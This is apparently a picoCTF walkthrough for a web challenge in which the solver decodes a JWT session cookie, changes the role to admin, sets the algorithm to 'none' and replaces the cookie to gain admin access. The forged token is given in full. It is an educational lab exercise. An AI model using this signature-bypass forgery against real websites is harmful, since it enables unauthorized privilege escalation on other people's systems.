Points: 300
Tags: picoGym Exclusive, Web Exploitation
Author: GEOFFREY NJOGU
Description:
Most web application developers use third party components without testing their security.
Some of the past affected companies are:
* Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
* Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
* VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one?
The website is running here. Can you become an admin?
You can login as test with the password Test123! to get started.
Hints:
1. Use the web browser tools to check out the JWT cookie.
2. The JWT should always have two (2) . separators.
Challenge link: https://play.picoctf.org/practice/challenge/236
Browse to the web site and login with test:Test123!
Next use your browsers DevTools (press F12) and select the Application tab. Then select the token cookie.
Copy the cookie which should look like this
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjkwMjIzODc4MjA1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTQuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjkwMjIzODc4fQ.XbdYap8wn4MDxo8PiK0XYjRv2hE-UHrSa8xlLmTGbEo
This is a Java Web Token (JWT) and it consists of 3 parts separated by dots:
- Header
- Payload
- Signature
Decode the JSON Web Token (JWT) on an online service such as Token.Dev. Replace the dummy/demo JWT with your data.
The data is base64-decoded and you can see that the header contains
{
"typ": "JWT",
"alg": "HS256"
}
And the payload contains
{
"auth": 1690223878205,
"agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
"role": "user",
"iat": 1690223878
}
The auth and iat fields are timestamps and will be different in your case.
Note that the role field says "user".
Instead of role user we want to be admin, so change this field
{
"auth": 1690223878205,
"agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
"role": "admin",
"iat": 1690223878
}
But now we have a problem. The signature isn't valid anymore.
However, we can bypass this by changing the algorithm to none. This disables/removes the signature.
{
"typ": "JWT",
"alg": "none"
}
Copy the new JWT and remember the hint. A JWT should always have two periods and our new JWT only have one.
So add an additional period at the end.
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjkwMjIzODc4MjA1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTQuMC4wLjAgU2FmYXJpLzUzNy4zNiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTY5MDIyMzg3OH0.
Go back to the browser and replace the token cookie with the new one. Then reload the page (press F5).
You should now see the following message with the flag.
Hello, admin! You have logged in as admin!
picoCTF{<REDACTED>}
For additional information, please see the references below.